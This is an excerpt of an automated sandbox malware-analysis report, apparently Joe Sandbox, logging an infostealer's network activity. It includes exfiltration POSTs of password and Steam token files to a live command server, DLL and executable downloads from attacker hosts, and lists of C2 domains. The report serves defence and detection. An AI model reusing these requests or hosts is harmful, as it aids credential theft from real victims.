74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_data"------BFIIEHJDBKJKECBFHDGH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="file_data"------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: kasm.zubairgul.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="mode"3------IIEBGIDAAFHIJJJJEGCG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="mode"4------JKKFIIEBKEGIEBFIJKFI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: kasm.zubairgul.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 6a 69 6d 78 66 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="file_data"jimxfA==------IDHDGDHJEGHIDGDHCGCB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: kasm.zubairgul.comContent-Length: 130037Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="mode"5------GIJDGCAEBFIIECAKFHIJ--
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: kasm.zubairgul.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 35 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="mode"51------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="task_id"1285747------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="status"1------GCGCFCBAKKFBFIECAEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="mode"6------GCGCFCBAKKFBFIECAEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: cowod.hopto.orgContent-Length: 3213Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 23.197.127.21 23.197.127.21
Source: Joe Sandbox View	IP Address: 95.164.90.97 95.164.90.97

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49980 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

5_2_00406963

Source: global traffic	HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: kasm.zubairgul.com
Source: global traffic	DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic	DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic	DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic	DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic	DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic	DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic	DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic	DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic	DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
